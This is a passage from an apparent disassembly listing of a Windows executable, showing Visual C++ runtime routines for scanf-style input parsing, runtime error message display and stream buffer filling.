jz loc_409A59
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov [ebp+18Ch+var_190], eax
movzx eax, al
loc_40930B: ; CODE XREF: sub_408E67+45B�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_4092C4
loc_409316: ; CODE XREF: sub_408E67+40C�j
; sub_408E67+41A�j ...
cmp [ebp+18Ch+var_1A8], 0
jz loc_409416
cmp [ebp+18Ch+var_190], 65h
jz short loc_409330
cmp [ebp+18Ch+var_190], 45h
jnz loc_409416
loc_409330: ; CODE XREF: sub_408E67+4BD�j
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz loc_409416
mov eax, [ebp+18Ch+var_1B0]
mov byte ptr [ebx+eax], 65h
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
lea edi, [ebp+18Ch+var_1B0]
lea esi, [ebp+18Ch+var_1D8]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
cmp eax, 2Dh
mov [ebp+18Ch+var_190], eax
jnz short loc_40939B
mov eax, [ebp+18Ch+var_1B0]
mov byte ptr [ebx+eax], 2Dh
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
jmp short loc_4093A1
; ---------------------------------------------------------------------------
loc_40939B: ; CODE XREF: sub_408E67+50F�j
cmp [ebp+18Ch+var_190], 2Bh
jnz short loc_4093BE
loc_4093A1: ; CODE XREF: sub_408E67+532�j
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jnz short loc_4093B0
and [ebp+18Ch+var_198], eax
jmp short loc_4093BE
; ---------------------------------------------------------------------------
loc_4093B0: ; CODE XREF: sub_408E67+542�j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov [ebp+18Ch+var_190], eax
loc_4093BE: ; CODE XREF: sub_408E67+538�j
; sub_408E67+547�j
movzx eax, byte ptr [ebp+18Ch+var_190]
jmp short loc_40940B
; ---------------------------------------------------------------------------
loc_4093C4: ; CODE XREF: sub_408E67+5AD�j
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz short loc_409416
mov eax, [ebp+18Ch+var_1B0]
mov cl, byte ptr [ebp+18Ch+var_190]
inc [ebp+18Ch+var_1A8]
mov [ebx+eax], cl
lea eax, [ebp+18Ch+var_1D0]
push eax
lea eax, [ebp+18Ch+var_184]
push eax
inc ebx
push ebx
lea edi, [ebp+18Ch+var_1B0]
lea esi, [ebp+18Ch+var_1D8]
call sub_408DD8
add esp, 0Ch
test eax, eax
jz loc_409A59
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov [ebp+18Ch+var_190], eax
movzx eax, al
loc_40940B: ; CODE XREF: sub_408E67+55B�j
push eax
call sub_40F17F
test eax, eax
pop ecx
jnz short loc_4093C4
loc_409416: ; CODE XREF: sub_408E67+4B3�j
; sub_408E67+4C3�j ...
dec [ebp+18Ch+var_188]
cmp [ebp+18Ch+var_190], 0FFFFFFFFh
jz short loc_40942C
push [ebp+18Ch+var_1A0]
push [ebp+18Ch+var_190]
call sub_40F29F
pop ecx
pop ecx
loc_40942C: ; CODE XREF: sub_408E67+5B6�j
cmp [ebp+18Ch+var_1A8], 0
jz loc_409A59
cmp [ebp+18Ch+var_199], 0
jnz loc_4099C1
mov eax, [ebp+18Ch+var_1B0]
inc [ebp+18Ch+var_1C8]
lea ecx, [ebp+18Ch+var_1F8]
push ecx
push eax
push [ebp+18Ch+var_1C4]
mov byte ptr [ebx+eax], 0
movsx eax, [ebp+18Ch+var_19A]
dec eax
push eax
push off_423F9C
call sub_405193
pop ecx
call eax
add esp, 10h
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_40946E: ; CODE XREF: sub_408E67+31B�j
test ecx, ecx
jnz short loc_40947C
inc [ebp+18Ch+var_198]
mov [ebp+18Ch+var_1B8], 1
loc_40947C: ; CODE XREF: sub_408E67+609�j
; sub_408E67+723�j
cmp [ebp+18Ch+var_191], 0
jle short loc_409486
mov [ebp+18Ch+var_1A2], 1
loc_409486: ; CODE XREF: sub_408E67+619�j
; sub_408E67+823�j
dec [ebp+18Ch+var_188]
cmp [ebp+18Ch+var_190], 0FFFFFFFFh
mov edi, esi
jz short loc_40949E
push [ebp+18Ch+var_1A0]
push [ebp+18Ch+var_190]
call sub_40F29F
pop ecx
pop ecx
loc_40949E: ; CODE XREF: sub_408E67+628�j
; sub_408E67+8E6�j ...
cmp [ebp+18Ch+var_1B8], 0
jz short loc_4094B2
mov eax, [ebp+18Ch+var_198]
dec [ebp+18Ch+var_198]
test eax, eax
jz loc_40976B
loc_4094B2: ; CODE XREF: sub_408E67+63B�j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
cmp eax, 0FFFFFFFFh
mov [ebp+18Ch+var_190], eax
jz loc_409758
cmp ebx, 63h
jz short loc_409517
cmp ebx, 73h
jnz short loc_4094E6
cmp eax, 9
jl short loc_4094E1
cmp eax, 0Dh
jle loc_409758
loc_4094E1: ; CODE XREF: sub_408E67+66F�j
cmp eax, 20h
jnz short loc_409517
loc_4094E6: ; CODE XREF: sub_408E67+66A�j
cmp ebx, 7Bh
jnz loc_409758
movsx ebx, [ebp+18Ch+var_1A4]
xor edx, edx
mov ecx, eax
and ecx, 7
inc edx
shl edx, cl
mov ecx, eax
sar ecx, 3
movsx ecx, [ebp+ecx+18Ch+var_24]
xor ecx, ebx
test edx, ecx
mov ebx, [ebp+18Ch+var_1AC]
jz loc_409758
loc_409517: ; CODE XREF: sub_408E67+665�j
; sub_408E67+67D�j
cmp [ebp+18Ch+var_199], 0
jnz loc_409752
cmp [ebp+18Ch+var_1A2], 0
jz loc_409747
mov [ebp+18Ch+var_1DC], al
movzx eax, al
push eax
call sub_40CA36
test eax, eax
pop ecx
jz short loc_40954A
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov [ebp+18Ch+var_1DB], al
loc_40954A: ; CODE XREF: sub_408E67+6D3�j
lea eax, [ebp+18Ch+var_1F8]
push eax
mov eax, [ebp+18Ch+var_1F8]
mov [ebp+18Ch+var_1E8], 3Fh
push dword ptr [eax+0ACh]
lea eax, [ebp+18Ch+var_1DC]
push eax
lea eax, [ebp+18Ch+var_1E8]
push eax
call sub_40F3BD
mov ax, word ptr [ebp+18Ch+var_1E8]
add esp, 10h
mov [esi], ax
inc esi
inc esi
jmp loc_40974A
; ---------------------------------------------------------------------------
loc_40957C: ; CODE XREF: sub_408E67+30C�j
mov eax, ebx
sub eax, 70h
jz loc_4097A3
sub eax, 3
jz loc_40947C
dec eax
dec eax
jz loc_4097A7
sub eax, 3
jz loc_4091C1
sub eax, 3
jz short loc_4095CA
loc_4095A6: ; CODE XREF: sub_408E67+32C�j
; sub_408E67+33F�j
movzx eax, byte ptr [edi]
cmp eax, [ebp+18Ch+var_190]
jnz loc_409A31
dec [ebp+18Ch+var_1A1]
cmp [ebp+18Ch+var_199], 0
jnz loc_4099C1
mov eax, [ebp+18Ch+var_1FC]
mov [ebp+18Ch+var_1E4], eax
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4095CA: ; CODE XREF: sub_408E67+73D�j
cmp [ebp+18Ch+var_191], 0
jle short loc_4095D4
mov [ebp+18Ch+var_1A2], 1
loc_4095D4: ; CODE XREF: sub_408E67+767�j
inc edi
cmp byte ptr [edi], 5Eh
mov esi, edi
jnz short loc_4095E3
lea esi, [edi+1]
mov [ebp+18Ch+var_1A4], 0FFh
loc_4095E3: ; CODE XREF: sub_408E67+773�j
push 20h
lea eax, [ebp+18Ch+var_24]
push 0
push eax
call sub_407B70
add esp, 0Ch
cmp byte ptr [esi], 5Dh
jnz short loc_409607
mov dl, 5Dh
inc esi
mov [ebp+18Ch+var_19], 20h
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_409607: ; CODE XREF: sub_408E67+792�j
mov dl, [ebp+18Ch+var_1C9]
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_40960C: ; CODE XREF: sub_408E67+813�j
inc esi
cmp al, 2Dh
jnz short loc_409659
test dl, dl
jz short loc_409659
mov cl, [esi]
cmp cl, 5Dh
jz short loc_409659
inc esi
cmp dl, cl
jnb short loc_409625
mov al, cl
jmp short loc_409629
; ---------------------------------------------------------------------------
loc_409625: ; CODE XREF: sub_408E67+7B8�j
mov al, dl
mov dl, cl
loc_409629: ; CODE XREF: sub_408E67+7BC�j
cmp dl, al
ja short loc_409655
sub al, dl
inc al
movzx edi, dl
movzx edx, al
loc_409637: ; CODE XREF: sub_408E67+7E9�j
mov ecx, edi
and ecx, 7
mov eax, edi
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+18Ch+var_24]
or [eax], bl
inc edi
dec edx
jnz short loc_409637
mov ebx, [ebp+18Ch+var_1AC]
loc_409655: ; CODE XREF: sub_408E67+7C4�j
xor dl, dl
jmp short loc_409676
; ---------------------------------------------------------------------------
loc_409659: ; CODE XREF: sub_408E67+7A8�j
; sub_408E67+7AC�j ...
movzx ecx, al
mov dl, al
mov eax, ecx
and ecx, 7
mov bl, 1
shl bl, cl
shr eax, 3
lea eax, [ebp+eax+18Ch+var_24]
or [eax], bl
mov ebx, [ebp+18Ch+var_1AC]
loc_409676: ; CODE XREF: sub_408E67+79E�j
; sub_408E67+7A3�j ...
mov al, [esi]
cmp al, 5Dh
jnz short loc_40960C
test al, al
jz loc_409A59
mov [ebp+18Ch+var_1B4], esi
mov esi, [ebp+18Ch+var_1C4]
jmp loc_409486
; ---------------------------------------------------------------------------
loc_40968F: ; CODE XREF: sub_408E67+360�j
cmp ebx, 2Bh
jnz short loc_4096B3
loc_409694: ; CODE XREF: sub_408E67+36A�j
dec [ebp+18Ch+var_198]
jnz short loc_4096A3
test ecx, ecx
jz short loc_4096A3
mov [ebp+18Ch+var_189], 1
jmp short loc_4096B3
; ---------------------------------------------------------------------------
loc_4096A3: ; CODE XREF: sub_408E67+830�j
; sub_408E67+834�j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov ebx, eax
mov [ebp+18Ch+var_190], ebx
loc_4096B3: ; CODE XREF: sub_408E67+82B�j
; sub_408E67+83A�j
cmp ebx, 30h
jnz loc_4097D9
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov ebx, eax
cmp bl, 78h
mov [ebp+18Ch+var_190], ebx
jz short loc_409718
cmp bl, 58h
jz short loc_409718
cmp [ebp+18Ch+var_1AC], 78h
mov [ebp+18Ch+var_1A8], 1
jz short loc_4096FD
cmp [ebp+18Ch+var_1B8], 0
jz short loc_4096F1
dec [ebp+18Ch+var_198]
jnz short loc_4096F1
inc [ebp+18Ch+var_189]
loc_4096F1: ; CODE XREF: sub_408E67+880�j
; sub_408E67+885�j
mov [ebp+18Ch+var_1AC], 6Fh
jmp loc_4097D9
; ---------------------------------------------------------------------------
loc_4096FD: ; CODE XREF: sub_408E67+87A�j
dec [ebp+18Ch+var_188]
cmp ebx, 0FFFFFFFFh
jz short loc_409710
push [ebp+18Ch+var_1A0]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_409710: ; CODE XREF: sub_408E67+89C�j
push 30h
pop ebx
jmp loc_4097D6
; ---------------------------------------------------------------------------
loc_409718: ; CODE XREF: sub_408E67+868�j
; sub_408E67+86D�j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
cmp [ebp+18Ch+var_1B8], 0
mov ebx, eax
mov [ebp+18Ch+var_190], ebx
jz short loc_40973B
sub [ebp+18Ch+var_198], 2
cmp [ebp+18Ch+var_198], 1
jge short loc_40973B
inc [ebp+18Ch+var_189]
loc_40973B: ; CODE XREF: sub_408E67+8C5�j
; sub_408E67+8CF�j
mov [ebp+18Ch+var_1AC], 78h
jmp loc_4097D9
; ---------------------------------------------------------------------------
loc_409747: ; CODE XREF: sub_408E67+6BE�j
mov [esi], al
inc esi
loc_40974A: ; CODE XREF: sub_408E67+710�j
mov [ebp+18Ch+var_1C4], esi
jmp loc_40949E
; ---------------------------------------------------------------------------
loc_409752: ; CODE XREF: sub_408E67+6B4�j
inc edi
jmp loc_40949E
; ---------------------------------------------------------------------------
loc_409758: ; CODE XREF: sub_408E67+65C�j
; sub_408E67+674�j ...
dec [ebp+18Ch+var_188]
cmp eax, 0FFFFFFFFh
jz short loc_40976B
push [ebp+18Ch+var_1A0]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_40976B: ; CODE XREF: sub_408E67+645�j
; sub_408E67+8F7�j
cmp edi, esi
jz loc_409A59
cmp [ebp+18Ch+var_199], 0
jnz loc_4099C1
inc [ebp+18Ch+var_1C8]
cmp ebx, 63h
jz loc_4099C1
cmp [ebp+18Ch+var_1A2], 0
mov eax, [ebp+18Ch+var_1C4]
jz short loc_40979B
and word ptr [eax], 0
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_40979B: ; CODE XREF: sub_408E67+929�j
mov byte ptr [eax], 0
jmp loc_4099C1
; ---------------------------------------------------------------------------
loc_4097A3: ; CODE XREF: sub_408E67+71A�j
mov [ebp+18Ch+var_19A], 1
loc_4097A7: ; CODE XREF: sub_408E67+312�j
; sub_408E67+326�j ...
mov ebx, [ebp+18Ch+var_190]
cmp ebx, 2Dh
jnz short loc_4097B5
mov [ebp+18Ch+var_1A3], 1
jmp short loc_4097BA
; ---------------------------------------------------------------------------
loc_4097B5: ; CODE XREF: sub_408E67+946�j
cmp ebx, 2Bh
jnz short loc_4097D9
loc_4097BA: ; CODE XREF: sub_408E67+94C�j
dec [ebp+18Ch+var_198]
jnz short loc_4097C9
test ecx, ecx
jz short loc_4097C9
mov [ebp+18Ch+var_189], 1
jmp short loc_4097D9
; ---------------------------------------------------------------------------
loc_4097C9: ; CODE XREF: sub_408E67+956�j
; sub_408E67+95A�j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov ebx, eax
loc_4097D6: ; CODE XREF: sub_408E67+8AC�j
mov [ebp+18Ch+var_190], ebx
loc_4097D9: ; CODE XREF: sub_408E67+84F�j
; sub_408E67+891�j ...
cmp [ebp+18Ch+var_1D4], 0
jz loc_4098DE
cmp [ebp+18Ch+var_189], 0
jnz loc_4098B9
loc_4097ED: ; CODE XREF: sub_408E67+A3A�j
cmp [ebp+18Ch+var_1AC], 78h
jz short loc_409842
cmp [ebp+18Ch+var_1AC], 70h
jz short loc_409842
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz loc_4098A6
cmp [ebp+18Ch+var_1AC], 6Fh
jnz short loc_40982C
cmp ebx, 38h
jge loc_4098A6
mov eax, [ebp+18Ch+var_1BC]
mov esi, [ebp+18Ch+var_1C0]
shld eax, esi, 3
shl esi, 3
mov [ebp+18Ch+var_1BC], eax
jmp short loc_409877
; ---------------------------------------------------------------------------
loc_40982C: ; CODE XREF: sub_408E67+9A8�j
push 0
push 0Ah
push [ebp+18Ch+var_1BC]
push [ebp+18Ch+var_1C0]
call sub_40F4F0
mov esi, eax
mov [ebp+18Ch+var_1BC], edx
jmp short loc_409877
; ---------------------------------------------------------------------------
loc_409842: ; CODE XREF: sub_408E67+98A�j
; sub_408E67+990�j
movzx edi, bl
push edi
call sub_40F1FC
test eax, eax
pop ecx
jz short loc_4098A6
mov eax, [ebp+18Ch+var_1BC]
mov esi, [ebp+18Ch+var_1C0]
shld eax, esi, 4
push edi
shl esi, 4
mov [ebp+18Ch+var_1BC], eax
call sub_40F17F
test eax, eax
pop ecx
movsx ebx, bl
jnz short loc_409874
and ebx, 0FFFFFFDFh
sub ebx, 7
loc_409874: ; CODE XREF: sub_408E67+A05�j
mov [ebp+18Ch+var_190], ebx
loc_409877: ; CODE XREF: sub_408E67+9C3�j
; sub_408E67+9D9�j
inc [ebp+18Ch+var_1A8]
lea eax, [ebx-30h]
cdq
add esi, eax
adc [ebp+18Ch+var_1BC], edx
cmp [ebp+18Ch+var_1B8], 0
mov [ebp+18Ch+var_1C0], esi
jz short loc_409891
dec [ebp+18Ch+var_198]
jz short loc_4098B9
loc_409891: ; CODE XREF: sub_408E67+A23�j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov ebx, eax
mov [ebp+18Ch+var_190], ebx
jmp loc_4097ED
; ---------------------------------------------------------------------------
loc_4098A6: ; CODE XREF: sub_408E67+99E�j
; sub_408E67+9AD�j ...
dec [ebp+18Ch+var_188]
cmp ebx, 0FFFFFFFFh
jz short loc_4098B9
push [ebp+18Ch+var_1A0]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_4098B9: ; CODE XREF: sub_408E67+980�j
; sub_408E67+A28�j ...
cmp [ebp+18Ch+var_1A3], 0
mov edi, [ebp+18Ch+var_1E0]
jz loc_409981
mov eax, [ebp+18Ch+var_1C0]
mov ecx, [ebp+18Ch+var_1BC]
neg eax
adc ecx, 0
neg ecx
mov [ebp+18Ch+var_1C0], eax
mov [ebp+18Ch+var_1BC], ecx
jmp loc_409981
; ---------------------------------------------------------------------------
loc_4098DE: ; CODE XREF: sub_408E67+976�j
cmp [ebp+18Ch+var_189], 0
mov edi, [ebp+18Ch+var_1E0]
jnz loc_409979
loc_4098EB: ; CODE XREF: sub_408E67+AFD�j
cmp [ebp+18Ch+var_1AC], 78h
jz short loc_40991A
cmp [ebp+18Ch+var_1AC], 70h
jz short loc_40991A
movzx eax, bl
push eax
call sub_40F17F
test eax, eax
pop ecx
jz short loc_409966
cmp [ebp+18Ch+var_1AC], 6Fh
jnz short loc_409915
cmp ebx, 38h
jge short loc_409966
shl edi, 3
jmp short loc_409942
; ---------------------------------------------------------------------------
loc_409915: ; CODE XREF: sub_408E67+AA2�j
imul edi, 0Ah
jmp short loc_409942
; ---------------------------------------------------------------------------
loc_40991A: ; CODE XREF: sub_408E67+A88�j
; sub_408E67+A8E�j
movzx esi, bl
push esi
call sub_40F1FC
test eax, eax
pop ecx
jz short loc_409966
push esi
shl edi, 4
call sub_40F17F
test eax, eax
pop ecx
movsx ebx, bl
jnz short loc_40993F
and ebx, 0FFFFFFDFh
sub ebx, 7
loc_40993F: ; CODE XREF: sub_408E67+AD0�j
mov [ebp+18Ch+var_190], ebx
loc_409942: ; CODE XREF: sub_408E67+AAC�j
; sub_408E67+AB1�j
inc [ebp+18Ch+var_1A8]
cmp [ebp+18Ch+var_1B8], 0
lea edi, [edi+ebx-30h]
jz short loc_409954
dec [ebp+18Ch+var_198]
jz short loc_409979
loc_409954: ; CODE XREF: sub_408E67+AE6�j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov ebx, eax
mov [ebp+18Ch+var_190], ebx
jmp short loc_4098EB
; ---------------------------------------------------------------------------
loc_409966: ; CODE XREF: sub_408E67+A9C�j
; sub_408E67+AA7�j ...
dec [ebp+18Ch+var_188]
cmp ebx, 0FFFFFFFFh
jz short loc_409979
push [ebp+18Ch+var_1A0]
push ebx
call sub_40F29F
pop ecx
pop ecx
loc_409979: ; CODE XREF: sub_408E67+A7E�j
; sub_408E67+AEB�j ...
cmp [ebp+18Ch+var_1A3], 0
jz short loc_409981
neg edi
loc_409981: ; CODE XREF: sub_408E67+A59�j
; sub_408E67+A72�j ...
cmp [ebp+18Ch+var_1AC], 46h
jnz short loc_40998B
and [ebp+18Ch+var_1A8], 0
loc_40998B: ; CODE XREF: sub_408E67+B1E�j
cmp [ebp+18Ch+var_1A8], 0
jz loc_409A59
cmp [ebp+18Ch+var_199], 0
jnz short loc_4099C1
inc [ebp+18Ch+var_1C8]
mov esi, [ebp+18Ch+var_1C4]
loc_4099A1: ; CODE XREF: sub_408E67+34C�j
cmp [ebp+18Ch+var_1D4], 0
jz short loc_4099B4
mov eax, [ebp+18Ch+var_1C0]
mov [esi], eax
mov eax, [ebp+18Ch+var_1BC]
mov [esi+4], eax
jmp short loc_4099C1
; ---------------------------------------------------------------------------
loc_4099B4: ; CODE XREF: sub_408E67+B3E�j
cmp [ebp+18Ch+var_19A], 0
jz short loc_4099BE
mov [esi], edi
jmp short loc_4099C1
; ---------------------------------------------------------------------------
loc_4099BE: ; CODE XREF: sub_408E67+B51�j
mov [esi], di
loc_4099C1: ; CODE XREF: sub_408E67+352�j
; sub_408E67+5D3�j ...
mov edi, [ebp+18Ch+var_1B4]
inc [ebp+18Ch+var_1A1]
inc edi
mov [ebp+18Ch+var_1B4], edi
jmp short loc_409A0F
; ---------------------------------------------------------------------------
loc_4099CD: ; CODE XREF: sub_408E67+17C�j
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
mov ebx, eax
movzx eax, byte ptr [edi]
inc edi
cmp eax, ebx
mov [ebp+18Ch+var_190], ebx
mov [ebp+18Ch+var_1B4], edi
jnz short loc_409A47
movzx eax, bl
push eax
call sub_40CA36
test eax, eax
pop ecx
jz short loc_409A0F
mov edx, [ebp+18Ch+var_1A0]
inc [ebp+18Ch+var_188]
call sub_408E2C
movzx ecx, byte ptr [edi]
inc edi
cmp ecx, eax
mov [ebp+18Ch+var_1B4], edi
jnz short loc_409A37
dec [ebp+18Ch+var_188]
loc_409A0F: ; CODE XREF: sub_408E67+B64�j
; sub_408E67+B8D�j
cmp [ebp+18Ch+var_190], 0FFFFFFFFh
jnz short loc_409A25
cmp byte ptr [edi], 25h
jnz short loc_409A59
mov eax, [ebp+18Ch+var_1B4]
cmp byte ptr [eax+1], 6Eh
jnz short loc_409A59
mov edi, eax
loc_409A25: ; CODE XREF: sub_408E67+174�j
; sub_408E67+BAC�j
mov al, [edi]
test al, al
jnz loc_408F9F
jmp short loc_409A59
; ---------------------------------------------------------------------------
loc_409A31: ; CODE XREF: sub_408E67+303�j
; sub_408E67+745�j
cmp [ebp+18Ch+var_190], 0FFFFFFFFh
jmp short loc_409A4A
; ---------------------------------------------------------------------------
loc_409A37: ; CODE XREF: sub_408E67+BA3�j
cmp eax, 0FFFFFFFFh
jz short loc_409A47
push [ebp+18Ch+var_1A0]
push eax
call sub_40F29F
pop ecx
pop ecx
loc_409A47: ; CODE XREF: sub_408E67+B7F�j
; sub_408E67+BD3�j
cmp ebx, 0FFFFFFFFh
loc_409A4A: ; CODE XREF: sub_408E67+BCE�j
jz short loc_409A59
push [ebp+18Ch+var_1A0]
push [ebp+18Ch+var_190]
call sub_40F29F
pop ecx
pop ecx
loc_409A59: ; CODE XREF: sub_408E67+2EC�j
; sub_408E67+3D7�j ...
cmp [ebp+18Ch+var_1D0], 1
jnz short loc_409A68
push [ebp+18Ch+var_1B0]
call sub_403603
pop ecx
loc_409A68: ; CODE XREF: sub_408E67+BF6�j
cmp [ebp+18Ch+var_190], 0FFFFFFFFh
jnz short loc_409A8C
mov eax, [ebp+18Ch+var_1C8]
test eax, eax
jnz short loc_409A7D
cmp [ebp+18Ch+var_1A1], al
jnz short loc_409A7D
or eax, 0FFFFFFFFh
loc_409A7D: ; CODE XREF: sub_408E67+C0C�j
; sub_408E67+C11�j
cmp [ebp+18Ch+var_1EC], 0
jz short loc_409A9C
mov ecx, [ebp+18Ch+var_1F0]
and dword ptr [ecx+70h], 0FFFFFFFDh
jmp short loc_409A9C
; ---------------------------------------------------------------------------
loc_409A8C: ; CODE XREF: sub_408E67+12F�j
; sub_408E67+C05�j
cmp [ebp+18Ch+var_1EC], 0
jz short loc_409A99
mov eax, [ebp+18Ch+var_1F0]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_409A99: ; CODE XREF: sub_408E67+C29�j
mov eax, [ebp+18Ch+var_1C8]
loc_409A9C: ; CODE XREF: sub_408E67+70�j
; sub_408E67+C1A�j ...
mov ecx, [ebp+18Ch+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 18Ch
leave
retn
sub_408E67 endp
; =============== S U B R O U T I N E =======================================
sub_409AB4 proc near ; CODE XREF: sub_4036E0+2A�p
; sub_403ED3+12�p ...
var_4 = byte ptr -4
arg_0 = dword ptr 4
push ecx
push ebx
mov ebx, [esp+8+arg_0]
push esi
push edi
xor esi, esi
xor edi, edi
loc_409AC0: ; CODE XREF: sub_409AB4+19�j
cmp ebx, dword_423C00[edi*8]
jz short loc_409ACF
inc edi
cmp edi, 17h
jl short loc_409AC0
loc_409ACF: ; CODE XREF: sub_409AB4+13�j
cmp edi, 17h
jnb loc_409C4F
push ebp
push 3
call sub_40F6C2
cmp eax, 1
pop ecx
jz loc_409C1B
push 3
call sub_40F6C2
test eax, eax
pop ecx
jnz short loc_409B03
cmp dword_423050, 1
jz loc_409C1B
loc_409B03: ; CODE XREF: sub_409AB4+40�j
cmp ebx, 0FCh
jz loc_409C4E
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
mov ebx, 314h
push ebx
mov ebp, offset dword_425FD8
push ebp
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_409B39
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409B39: ; CODE XREF: sub_409AB4+76�j
push 104h
mov esi, offset byte_425FF1
push esi
push 0
mov byte_4260F5, 0
call ds:dword_41D060 ; GetModuleFileNameA
test eax, eax
jnz short loc_409B7D
push offset aProgramNameUnk ; "<program name unknown>"
push 2FBh
push esi
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_409B7D
xor eax, eax
push eax
push eax
push eax
push eax
push eax
call sub_402E3D
add esp, 14h
loc_409B7D: ; CODE XREF: sub_409AB4+A1�j
; sub_409AB4+B8�j
push esi
call sub_404130
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_409BC2
push esi
call sub_404130
sub esi, 3Bh
add eax, esi
push 3
mov ecx, offset dword_4262EC
push offset a___ ; "..."
sub ecx, eax
push ecx
push eax
call sub_40C846
add esp, 14h
test eax, eax
jz short loc_409BC2
xor esi, esi
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
jmp short loc_409BC4
; ---------------------------------------------------------------------------
loc_409BC2: ; CODE XREF: sub_409AB4+D4�j
; sub_409AB4+FB�j
xor esi, esi
loc_409BC4: ; CODE XREF: sub_409AB4+10C�j
push offset asc_41DB10 ; "\n\n"
push ebx
push ebp
call sub_40C78D
add esp, 0Ch
test eax, eax
jz short loc_409BE4
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409BE4: ; CODE XREF: sub_409AB4+121�j
push off_423C04[edi*8]
push ebx
push ebp
call sub_40C78D
add esp, 0Ch
test eax, eax
jz short loc_409C06
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_409C06: ; CODE XREF: sub_409AB4+143�j
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebp
call sub_40F524
add esp, 0Ch
jmp short loc_409C4E
; ---------------------------------------------------------------------------
loc_409C1B: ; CODE XREF: sub_409AB4+30�j
; sub_409AB4+49�j
push 0FFFFFFF4h
call ds:dword_41D14C ; GetStdHandle
mov ebp, eax
cmp ebp, esi
jz short loc_409C4E
cmp ebp, 0FFFFFFFFh
jz short loc_409C4E
push 0
lea eax, [esp+18h+var_4]
push eax
lea esi, ds:423C04h[edi*8]
push dword ptr [esi]
call sub_404130
pop ecx
push eax
push dword ptr [esi]
push ebp
call ds:dword_41D088 ; WriteFile
loc_409C4E: ; CODE XREF: sub_409AB4+55�j
; sub_409AB4+165�j ...
pop ebp
loc_409C4F: ; CODE XREF: sub_409AB4+1E�j
pop edi
pop esi
pop ebx
pop ecx
retn
sub_409AB4 endp
; =============== S U B R O U T I N E =======================================
sub_409C54 proc near ; CODE XREF: sub_4036E0+23�p
; sub_403ED3+9�p ...
push 3
call sub_40F6C2
cmp eax, 1
pop ecx
jz short loc_409C76
push 3
call sub_40F6C2
test eax, eax
pop ecx
jnz short locret_409C8C
cmp dword_423050, 1
jnz short locret_409C8C
loc_409C76: ; CODE XREF: sub_409C54+B�j
push 0FCh
call sub_409AB4
push 0FFh
call sub_409AB4
pop ecx
pop ecx
locret_409C8C: ; CODE XREF: sub_409C54+17�j
; sub_409C54+20�j
retn
sub_409C54 endp
; =============== S U B R O U T I N E =======================================
sub_409C8D proc near ; CODE XREF: sub_403B22+ED�p
; sub_408E2C+F�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
cmp esi, edi
jnz short loc_409CB6
call sub_4057D3
push edi
push edi
push edi
push edi
push edi
mov dword ptr [eax], 16h
call sub_402F39
add esp, 14h
jmp loc_409DA7
; ---------------------------------------------------------------------------
loc_409CB6: ; CODE XREF: sub_409C8D+A�j
mov eax, [esi+0Ch]
test al, 83h
jz loc_409DA7
test al, 40h
jnz loc_409DA7
test al, 2
jz short loc_409CD8
or eax, 20h
mov [esi+0Ch], eax
jmp loc_409DA7
; ---------------------------------------------------------------------------
loc_409CD8: ; CODE XREF: sub_409C8D+3E�j
or eax, 1
test ax, 10Ch
mov [esi+0Ch], eax
jnz short loc_409CED
push esi
call sub_40D4FC
pop ecx
jmp short loc_409CF2
; ---------------------------------------------------------------------------
loc_409CED: ; CODE XREF: sub_409C8D+55�j
mov eax, [esi+8]
mov [esi], eax
loc_409CF2: ; CODE XREF: sub_409C8D+5E�j
